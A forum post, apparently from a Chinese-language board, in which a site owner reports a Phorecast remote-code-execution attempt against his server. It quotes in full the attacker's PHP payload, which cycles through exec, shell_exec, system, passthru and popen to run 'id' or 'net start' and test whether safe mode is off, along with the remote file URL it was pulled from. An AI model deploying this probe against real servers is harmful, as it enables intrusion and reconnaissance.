|
|
楼主 |
发表于 29-3-2008 03:06 AM
|
显示全部楼层
你又说是check PHP SafeMode on or off. seems like execute function or shell script
WEB-MISC Phorecast remote code execution attempt
retrieve from : http://www.motoxclub.org.au/forum/test.txt
Changing this CMD will result in corrupt scanning !
<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net
start")))){ echo("Safe Mode of this Server is : ");
echo("SafemodeOFF"); } else{ ini_restore("safe_mode");
ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) ||
(@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server
is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server
is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!
empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res =
join("\n",$res); } elseif(function_exists('shell_exec')){ $res =
@shell_exec($cfe); } elseif(function_exists('system')){ @ob_start();
@system($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe);
$res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f =
@popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,
1024); } @pclose($f); } } return $res; } exit;
What in essence they are trying to do is use this remote 'command' to 'order' my site to divulge information.
These portions tell me that the attacker is attempting to do a 'net start' on my Windows box.
[ 本帖最后由 Imnotsad 于 30-3-2008 01:59 AM 编辑 ] |
|
本周最热论坛帖子
发表于 22-3-2008 04:06 AM
变色卡
千斤顶
1898 
58
